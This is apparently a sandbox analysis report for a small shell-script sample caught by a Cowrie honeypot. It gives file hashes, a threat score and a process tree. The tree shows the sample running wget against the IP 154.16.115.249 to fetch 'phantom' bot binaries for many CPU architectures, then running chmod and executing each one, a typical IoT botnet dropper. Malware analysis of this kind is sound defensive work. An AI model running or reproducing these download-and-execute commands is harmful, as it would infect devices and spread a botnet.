1b5d46e827ac989be8cb2f99aa8ce3724a8f0d37cee9ff044abe66d74e0b884a

Analysis

max time kernel
0s
max time network
156s
platform
linux_armhf
resource
debian9-armhf-en-20211208
resource tags

arch:armhfimage:debian9-armhf-en-20211208kernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
18-10-2022 02:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

data/cowrie/downloads/dba1abed0c3a0e0e9ae8877d091c6e1ee90373a68cbafc09b907359391dd766c
Size

1KB
MD5

d282aeb196dc438987fa7fee1a0e660f
SHA1

050d2a4da69b9660a3a080292a08ee2db4f94eb3
SHA256

dba1abed0c3a0e0e9ae8877d091c6e1ee90373a68cbafc09b907359391dd766c
SHA512

45fe0bd9a44b8ee979bf03e8557452c3b1026975809ccf13e0b334a31c0b8daef0628464952c4cc78537e08c5d4be96845ae3e700259200b81a0b8177c56d7fb

Score

5^/10

Malware Config

Signatures

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
/tmp/data/cowrie/downloads/dba1abed0c3a0e0e9ae8877d091c6e1ee90373a68cbafc09b907359391dd766c	/tmp/data/cowrie/downloads/dba1abed0c3a0e0e9ae8877d091c6e1ee90373a68cbafc09b907359391dd766c	dba1abed0c3a0e0e9ae8877d091c6e1ee90373a68cbafc09b907359391dd766c

/tmp/data/cowrie/downloads/dba1abed0c3a0e0e9ae8877d091c6e1ee90373a68cbafc09b907359391dd766c
/tmp/data/cowrie/downloads/dba1abed0c3a0e0e9ae8877d091c6e1ee90373a68cbafc09b907359391dd766c
1⤵
- Writes file to tmp directory
PID:351
- /usr/bin/wget
  wget http://154.16.115.249/bins/phantom.x86
  2⤵
  PID:352
- /bin/cat
  cat phantom.x86
  2⤵
  PID:358
- /bin/chmod
  chmod +x data robben systemd-private-c3233288b684421da5109ee2d9cf168d-systemd-timesyncd.service-Qv0tw4
  2⤵
  PID:359
- ./robben
  ./robben Payload
  2⤵
  PID:360
- /usr/bin/wget
  wget http://154.16.115.249/bins/phantom.mips
  2⤵
  PID:362
- /bin/cat
  cat phantom.mips
  2⤵
  PID:364
- /bin/chmod
  chmod +x data robben systemd-private-c3233288b684421da5109ee2d9cf168d-systemd-timesyncd.service-Qv0tw4
  2⤵
  PID:365
- ./robben
  ./robben Payload
  2⤵
  PID:366
- /usr/bin/wget
  wget http://154.16.115.249/bins/phantom.mpsl
  2⤵
  PID:368
- /bin/cat
  cat phantom.mpsl
  2⤵
  PID:372
- /bin/chmod
  chmod +x data robben systemd-private-c3233288b684421da5109ee2d9cf168d-systemd-timesyncd.service-Qv0tw4
  2⤵
  PID:373
- ./robben
  ./robben Payload
  2⤵
  PID:374
- /usr/bin/wget
  wget http://154.16.115.249/bins/phantom.arm4
  2⤵
  PID:376
- /bin/cat
  cat phantom.arm4
  2⤵
  PID:378
- /bin/chmod
  chmod +x data robben systemd-private-c3233288b684421da5109ee2d9cf168d-systemd-timesyncd.service-Qv0tw4
  2⤵
  PID:379
- ./robben
  ./robben Payload
  2⤵
  PID:380
- /usr/bin/wget
  wget http://154.16.115.249/bins/phantom.arm5
  2⤵
  PID:382
- /bin/cat
  cat phantom.arm5
  2⤵
  PID:384
- /bin/chmod
  chmod +x data robben systemd-private-c3233288b684421da5109ee2d9cf168d-systemd-timesyncd.service-Qv0tw4
  2⤵
  PID:385
- ./robben
  ./robben Payload
  2⤵
  PID:386
- /usr/bin/wget
  wget http://154.16.115.249/bins/phantom.arm6
  2⤵
  PID:388
- /bin/cat
  cat phantom.arm6
  2⤵
  PID:390
- /bin/chmod
  chmod +x data robben systemd-private-c3233288b684421da5109ee2d9cf168d-systemd-timesyncd.service-Qv0tw4
  2⤵
  PID:391
- ./robben
  ./robben Payload
  2⤵
  PID:392
- /usr/bin/wget
  wget http://154.16.115.249/bins/phantom.arm7
  2⤵
  PID:394
- /bin/cat
  cat phantom.arm7
  2⤵
  PID:396
- /bin/chmod
  chmod +x data robben systemd-private-c3233288b684421da5109ee2d9cf168d-systemd-timesyncd.service-Qv0tw4
  2⤵
  PID:397
- ./robben
  ./robben Payload
  2⤵
  PID:398
- /usr/bin/wget
  wget http://154.16.115.249/bins/phantom.ppc
  2⤵
  PID:400
- /bin/cat
  cat phantom.ppc
  2⤵
  PID:402
- /bin/chmod
  chmod +x data robben systemd-private-c3233288b684421da5109ee2d9cf168d-systemd-timesyncd.service-Qv0tw4
  2⤵
  PID:403
- ./robben
  ./robben Payload
  2⤵
  PID:404
- /usr/bin/wget
  wget http://154.16.115.249/bins/phantom.m68k
  2⤵
  PID:406
- /bin/cat
  cat phantom.m68k
  2⤵
  PID:408
- /bin/chmod
  chmod +x data robben systemd-private-c3233288b684421da5109ee2d9cf168d-systemd-timesyncd.service-Qv0tw4
  2⤵
  PID:409
- ./robben
  ./robben Payload
  2⤵
  PID:410
- /usr/bin/wget
  wget http://154.16.115.249/bins/phantom.sh4
  2⤵
  PID:412
- /bin/cat
  cat phantom.sh4
  2⤵
  PID:414
- /bin/chmod
  chmod +x data robben systemd-private-c3233288b684421da5109ee2d9cf168d-systemd-timesyncd.service-Qv0tw4
  2⤵
  PID:415
- ./robben
  ./robben Payload
  2⤵
  PID:416

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads